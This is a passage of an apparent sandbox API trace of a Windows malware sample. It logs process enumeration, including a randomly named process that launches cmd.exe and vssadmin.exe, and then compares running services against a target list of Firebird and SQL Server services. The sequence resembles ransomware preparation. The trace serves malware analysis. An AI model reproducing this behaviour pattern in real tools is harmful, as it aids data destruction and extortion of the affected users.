	[0041.946] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0041.947] lstrlenW (lpString="svchost.exe") returned 11
	[0041.947] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0041.947] lstrlenW (lpString="dwm.exe") returned 7
	[0041.947] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0041.948] lstrlenW (lpString="explorer.exe") returned 12
	[0041.948] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0041.948] lstrlenW (lpString="spoolsv.exe") returned 11
	[0041.948] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0041.949] lstrlenW (lpString="taskhost.exe") returned 12
	[0041.949] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0041.949] lstrlenW (lpString="svchost.exe") returned 11
	[0041.949] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0041.949] lstrlenW (lpString="taskeng.exe") returned 11
	[0041.949] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0041.950] lstrlenW (lpString="taskhost.exe") returned 12
	[0041.950] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="encoding hanging.exe")) returned 1
	[0041.950] lstrlenW (lpString="encoding hanging.exe") returned 20
	[0041.950] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="python tragedy.exe")) returned 1
	[0041.951] lstrlenW (lpString="python tragedy.exe") returned 18
	[0041.951] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="talent-mastercard.exe")) returned 1
	[0041.951] lstrlenW (lpString="talent-mastercard.exe") returned 21
	[0041.951] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="computers.exe")) returned 1
	[0041.952] lstrlenW (lpString="computers.exe") returned 13
	[0041.952] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="separated.exe")) returned 1
	[0041.952] lstrlenW (lpString="separated.exe") returned 13
	[0041.952] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="disks executives interval.exe")) returned 1
	[0041.953] lstrlenW (lpString="disks executives interval.exe") returned 29
	[0041.953] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="darkness.exe")) returned 1
	[0041.953] lstrlenW (lpString="darkness.exe") returned 12
	[0041.953] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="crafts-distinct.exe")) returned 1
	[0041.954] lstrlenW (lpString="crafts-distinct.exe") returned 19
	[0041.954] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sophisticated.exe")) returned 1
	[0041.954] lstrlenW (lpString="sophisticated.exe") returned 17
	[0041.954] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wishlist.exe")) returned 1
	[0041.955] lstrlenW (lpString="wishlist.exe") returned 12
	[0041.955] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="top.exe")) returned 1
	[0041.955] lstrlenW (lpString="top.exe") returned 7
	[0041.955] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="implemented.exe")) returned 1
	[0041.956] lstrlenW (lpString="implemented.exe") returned 15
	[0041.956] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="comp.exe")) returned 1
	[0041.956] lstrlenW (lpString="comp.exe") returned 8
	[0041.956] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="synthetic_memphis.exe")) returned 1
	[0041.957] lstrlenW (lpString="synthetic_memphis.exe") returned 21
	[0041.957] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solved.exe")) returned 1
	[0041.957] lstrlenW (lpString="solved.exe") returned 10
	[0041.957] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bosnia resolution.exe")) returned 1
	[0041.958] lstrlenW (lpString="bosnia resolution.exe") returned 21
	[0041.958] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trips.exe")) returned 1
	[0041.958] lstrlenW (lpString="trips.exe") returned 9
	[0041.958] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tumormanual.exe")) returned 1
	[0041.959] lstrlenW (lpString="tumormanual.exe") returned 15
	[0041.959] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x494, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="telecom.exe")) returned 1
	[0042.251] lstrlenW (lpString="telecom.exe") returned 11
	[0042.252] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="realistic.exe")) returned 1
	[0042.252] lstrlenW (lpString="realistic.exe") returned 13
	[0042.252] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0042.252] lstrlenW (lpString="WmiPrvSE.exe") returned 12
	[0042.253] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0042.253] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0042.253] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x934, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0042.253] lstrlenW (lpString="cmd.exe") returned 7
	[0042.253] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0042.254] lstrlenW (lpString="conhost.exe") returned 11
	[0042.254] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x948, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1
	[0042.254] lstrlenW (lpString="vssadmin.exe") returned 12
	[0042.254] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1
	[0042.255] lstrlenW (lpString="VSSVC.exe") returned 9
	[0042.255] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 0
	[0042.255] CloseHandle (hObject=0x1f8) returned 1
	[0042.255] Sleep (dwMilliseconds=0x1f4) 
	[0043.048] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x7e0fc20
	[0043.049] EnumServicesStatusExW (in: hSCManager=0x7e0fc20, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 0
	[0043.049] GetLastError () returned 0xea
	[0043.049] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x12c6) returned 0xb4b70c0
	[0043.050] EnumServicesStatusExW (in: hSCManager=0x7e0fc20, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xb4b70c0, cbBufSize=0x12c6, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xb4b70c0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 1
	[0043.050] CloseServiceHandle (hSCObject=0x7e0fc20) returned 1
	[0043.050] lstrlenW (lpString="Appinfo") returned 7
	[0043.050] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1
	[0043.050] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1
	[0043.051] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1
	[0043.051] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1
	[0043.051] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1
	[0043.051] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0043.051] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0043.051] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0043.051] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0043.051] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0043.051] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0043.051] lstrlenW (lpString="AudioSrv") returned 8
	[0043.051] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0043.051] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0043.051] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0043.051] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0043.051] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0043.051] lstrlenW (lpString="BFE") returned 3
	[0043.051] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0043.051] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0043.051] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0043.051] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0043.051] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0043.051] lstrlenW (lpString="CryptSvc") returned 8
	[0043.051] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0043.051] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0043.051] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0043.051] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0043.051] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0043.051] lstrlenW (lpString="CscService") returned 10
	[0043.051] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0043.051] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0043.051] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0043.051] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0043.051] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0043.051] lstrlenW (lpString="DcomLaunch") returned 10
	[0043.052] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0043.052] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0043.052] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0043.052] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0043.052] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0043.052] lstrlenW (lpString="Dhcp") returned 4
	[0043.052] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0043.052] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0043.052] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0043.052] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0043.052] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0043.052] lstrlenW (lpString="Dnscache") returned 8
	[0043.052] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0043.052] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0043.052] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0043.052] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0043.052] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0043.052] lstrlenW (lpString="DPS") returned 3
	[0043.052] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0043.052] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0043.052] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0043.052] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0043.052] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0043.052] lstrlenW (lpString="eventlog") returned 8
	[0043.052] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0043.052] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0043.052] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0043.052] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0043.052] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0043.052] lstrlenW (lpString="EventSystem") returned 11
	[0043.052] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0043.052] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0043.052] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0043.052] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0043.053] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0043.053] lstrlenW (lpString="gpsvc") returned 5
	[0043.053] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0043.053] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0043.053] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0043.053] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0043.053] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0043.053] lstrlenW (lpString="iphlpsvc") returned 8
	[0043.053] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0043.053] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0043.053] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0043.053] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0043.053] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0043.053] lstrlenW (lpString="LanmanServer") returned 12
	[0043.053] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0043.053] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0043.053] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0043.053] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0043.053] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0043.053] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0043.053] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0043.053] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0043.053] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0043.053] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0043.053] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0043.053] lstrlenW (lpString="lmhosts") returned 7
	[0043.053] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0043.053] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0043.053] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0043.053] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0043.053] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0043.053] lstrlenW (lpString="MMCSS") returned 5
	[0043.053] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0043.053] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0043.054] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0043.054] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0043.054] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0043.054] lstrlenW (lpString="MpsSvc") returned 6
	[0043.054] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0043.054] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0043.054] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0043.054] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0043.054] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0043.054] lstrlenW (lpString="Netman") returned 6
	[0043.054] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1
	[0043.054] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1
	[0043.054] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1
	[0043.054] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1
	[0043.054] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1
	[0043.054] lstrlenW (lpString="netprofm") returned 8
	[0043.054] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1
	[0043.054] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1
	[0043.054] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1
	[0043.054] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1
	[0043.054] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1
	[0043.054] lstrlenW (lpString="NlaSvc") returned 6
	[0043.054] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0043.054] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0043.054] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0043.054] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0043.054] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0043.054] lstrlenW (lpString="nsi") returned 3
	[0043.054] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0043.054] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0043.054] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0043.054] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0043.054] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0043.054] lstrlenW (lpString="PcaSvc") returned 6
	[0043.055] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0043.055] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0043.055] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0043.055] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0043.055] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0043.055] lstrlenW (lpString="PlugPlay") returned 8
	[0043.055] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0043.055] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0043.055] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0043.055] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0043.055] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0043.055] lstrlenW (lpString="Power") returned 5
	[0043.055] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
